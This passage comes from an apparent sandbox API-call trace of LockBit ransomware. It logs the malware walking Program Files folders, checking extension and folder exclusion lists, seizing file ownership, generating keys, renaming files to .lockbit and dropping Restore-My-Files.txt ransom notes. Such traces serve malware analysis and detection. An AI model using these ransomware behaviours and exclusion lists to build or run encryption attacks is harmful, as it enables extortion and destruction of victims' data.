(pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_uparrow.png") returned=".png" [0079.381] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0079.381] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0079.381] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0079.381] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0079.381] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0079.381] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0079.381] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0079.381] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0079.381] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0079.381] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0079.381] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0079.381] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0079.381] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0079.381] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0079.381] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0079.381] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0079.381] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0079.381] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0079.381] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0079.381] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0079.381] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0079.381] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0079.381] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0079.381] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0079.381] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0079.381] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0079.381] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0079.381] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0079.381] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_uparrow.png.lockbit") returned 76 [0079.382] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_uparrow.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\nav_uparrow.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.382] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0079.382] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0079.382] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0079.382] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0079.383] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0079.383] RtlFreeAnsiString (AnsiString="\\") [0079.383] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c4) returned 0x0 [0079.383] malloc (_Size=0x200) returned 0x77d800 [0079.383] NtQueryInformationToken (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0079.383] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0079.383] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0079.383] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_uparrow.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0079.383] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_uparrow.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0079.383] CloseHandle (hObject=0x3c4) returned 1 [0079.383] free (_Block=0x77d800) [0079.384] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_uparrow.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\nav_uparrow.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0079.384] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0079.384] malloc (_Size=0x40068) returned 0x1fb18c0 [0079.384] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=4200) returned 1 [0079.384] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.384] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.384] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0079.384] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.385] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.385] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0079.385] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0079.390] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_uparrow.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_uparrow.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0079.390] malloc (_Size=0xae) returned 0x1ff1e60 [0079.390] NtSetInformationFile (FileHandle=0x3c4, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xae, FileInformationClass=0xa) returned 0xc0000008 [0079.390] free (_Block=0x1ff1e60) [0079.390] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_uparrow.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy") returned 1 [0079.390] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\Restore-My-Files.txt") returned 73 [0079.390] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.390] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71018dde, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71018dde, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49f4d6d7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1068, dwReserved0=0x0, dwReserved1=0x0, cFileName="nav_uparrow.png", cAlternateFileName="")) returned 0 [0079.391] FindClose (in: hFindFile=0x55fe78 | out: hFindFile=0x55fe78) returned 1 [0079.391] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa12338ef, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaab67eab, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa15a10e8, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x520150, dwReserved1=0x0, cFileName="BabyGirl", cAlternateFileName="")) returned 1 [0079.391] lstrcmpiW (lpString1=".", lpString2="BabyGirl") returned -1 [0079.391] lstrcmpiW (lpString1="..", lpString2="BabyGirl") returned -1 [0079.391] lstrcmpiW (lpString1="BabyGirl", lpString2="$windows.~bt") returned 1 [0079.391] lstrcmpiW (lpString1="BabyGirl", lpString2="intel") returned -1 [0079.391] lstrcmpiW (lpString1="BabyGirl", lpString2="msocache") returned -1 [0079.391] lstrcmpiW (lpString1="BabyGirl", lpString2="$recycle.bin") returned 1 [0079.391] lstrcmpiW (lpString1="BabyGirl", lpString2="$windows.~ws") returned 1 [0079.391] lstrcmpiW (lpString1="BabyGirl", lpString2="tor browser") returned -1 [0079.391] lstrcmpiW (lpString1="BabyGirl", lpString2="boot") returned -1 [0079.391] lstrcmpiW (lpString1="BabyGirl", lpString2="system volume information") returned -1 [0079.391] lstrcmpiW (lpString1="BabyGirl", lpString2="perflogs") returned -1 [0079.391] lstrcmpiW (lpString1="BabyGirl", lpString2="google") returned -1 [0079.391] lstrcmpiW (lpString1="BabyGirl", lpString2="application data") returned 1 [0079.391] lstrcmpiW (lpString1="BabyGirl", lpString2="windows") returned -1 [0079.391] lstrcmpiW (lpString1="BabyGirl", lpString2="windows.old") returned -1 [0079.391] lstrcmpiW (lpString1="BabyGirl", lpString2="appdata") returned 1 [0079.391] lstrcmpiW (lpString1="BabyGirl", lpString2="Windows nt") returned -1 [0079.391] lstrcmpiW (lpString1="BabyGirl", lpString2="Msbuild") returned -1 [0079.391] lstrcmpiW (lpString1="BabyGirl", lpString2="Microsoft") returned -1 [0079.391] lstrcmpiW (lpString1="BabyGirl", lpString2="All users") returned 1 [0079.391] lstrcmpiW (lpString1="BabyGirl", lpString2="mozilla") returned -1 [0079.391] lstrcmpiW (lpString1="BabyGirl", lpString2="Microsoft.NET") returned -1 [0079.391] lstrcmpiW (lpString1="BabyGirl", lpString2="microsoft shared") returned -1 [0079.391] lstrcmpiW (lpString1="BabyGirl", lpString2="Internet Explorer") returned -1 [0079.391] lstrcmpiW (lpString1="BabyGirl", lpString2="common files") returned -1 [0079.391] lstrcmpiW (lpString1="BabyGirl", lpString2="opera") returned -1 [0079.391] lstrcmpiW (lpString1="BabyGirl", lpString2="Windows Journal") returned -1 [0079.392] wsprintfW (in: param_1=0x3d6b928, param_2="%s\\%s" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl") returned 53 [0079.392] wsprintfW (in: param_1=0x3d6ad00, param_2="%s\\*" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\*") returned 55 [0079.392] FindFirstFileExW (in: lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\*", fInfoLevelId=0x0, lpFindFileData=0x3d6b120, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x3d6b120) returned 0x55fe78 [0079.394] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0079.394] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa12338ef, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaab67eab, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa15a10e8, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0079.394] lstrcmpiW (lpString1=".", lpString2="..") returned -1 [0079.394] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0079.394] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72858c15, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72858c15, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49f4d6d7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xab3, dwReserved0=0x0, dwReserved1=0x0, cFileName="16_9-frame-background.png", cAlternateFileName="")) returned 1 [0079.394] lstrcmpiW (lpString1=".", lpString2="16_9-frame-background.png") returned -1 [0079.394] lstrcmpiW (lpString1="..", lpString2="16_9-frame-background.png") returned -1 [0079.394] PathFindExtensionW (pszPath="16_9-frame-background.png") returned=".png" [0079.394] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0079.394] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0079.394] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0079.394] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0079.394] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0079.394] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0079.394] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0079.394] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0079.394] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0079.394] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0079.394] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0079.394] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0079.394] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0079.394] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0079.394] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0079.395] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0079.395] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0079.395] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0079.395] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0079.395] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0079.395] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0079.395] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0079.395] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0079.395] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0079.395] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0079.395] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0079.395] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0079.395] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0079.395] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0079.395] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0079.395] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0079.395] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0079.395] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0079.395] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0079.395] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0079.395] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0079.395] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0079.395] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0079.395] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0079.395] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0079.395] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0079.395] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0079.395] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0079.395] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0079.395] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0079.395] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0079.395] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0079.396] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="16_9-frame-background.png") returned 1 [0079.396] lstrcmpiW (lpString1="ntldr", lpString2="16_9-frame-background.png") returned 1 [0079.396] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="16_9-frame-background.png") returned 1 [0079.396] lstrcmpiW (lpString1="bootsect.bak", lpString2="16_9-frame-background.png") returned 1 [0079.396] lstrcmpiW (lpString1="autorun.inf", lpString2="16_9-frame-background.png") returned 1 [0079.396] lstrcmpiW (lpString1="thumbs.db", lpString2="16_9-frame-background.png") returned 1 [0079.396] lstrcmpiW (lpString1="iconcache.db", lpString2="16_9-frame-background.png") returned 1 [0079.396] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\") returned="" [0079.396] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-background.png") returned=".png" [0079.396] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0079.396] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0079.396] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0079.396] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0079.396] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0079.396] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0079.396] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0079.396] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0079.396] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0079.396] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0079.396] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0079.396] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0079.396] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0079.396] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0079.396] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0079.396] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0079.396] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0079.396] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0079.396] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0079.396] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0079.396] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0079.397] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0079.397] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0079.397] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0079.397] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0079.397] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0079.397] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0079.397] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0079.397] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-background.png.lockbit") returned 87 [0079.397] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\16_9-frame-background.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.397] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0079.397] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0079.397] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0079.398] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0079.398] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0079.398] RtlFreeAnsiString (AnsiString="\\") [0079.398] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c4) returned 0x0 [0079.398] malloc (_Size=0x200) returned 0x77d800 [0079.398] NtQueryInformationToken (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0079.398] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0079.398] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0079.398] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-background.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0079.399] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-background.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0079.399] CloseHandle (hObject=0x3c4) returned 1 [0079.399] free (_Block=0x77d800) [0079.399] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\16_9-frame-background.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0079.399] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0079.399] malloc (_Size=0x40068) returned 0x1fb18c0 [0079.399] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=2739) returned 1 [0079.399] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.400] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.400] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0079.400] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.400] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.400] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0079.400] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0079.408] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-background.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-background.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0079.408] malloc (_Size=0xc4) returned 0x1ff1e60 [0079.408] NtSetInformationFile (FileHandle=0x3c4, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xc4, FileInformationClass=0xa) returned 0xc0000008 [0079.408] free (_Block=0x1ff1e60) [0079.408] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-background.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl") returned 1 [0079.408] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Restore-My-Files.txt") returned 74 [0079.409] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0079.409] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0079.409] malloc (_Size=0x40068) returned 0x1fb18c0 [0079.409] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fa30f8, nNumberOfBytesToWrite=0x472, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fa30f8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0079.411] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72858c15, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72858c15, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49f4d6d7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x8a3, dwReserved0=0x0, dwReserved1=0x0, cFileName="16_9-frame-highlight.png", cAlternateFileName="")) returned 1 [0079.411] lstrcmpiW (lpString1=".", lpString2="16_9-frame-highlight.png") returned -1 [0079.411] lstrcmpiW (lpString1="..", lpString2="16_9-frame-highlight.png") returned -1 [0079.411] PathFindExtensionW (pszPath="16_9-frame-highlight.png") returned=".png" [0079.411] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0079.411] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0079.411] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0079.411] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0079.411] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0079.411] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0079.411] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0079.411] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0079.411] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0079.411] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0079.411] 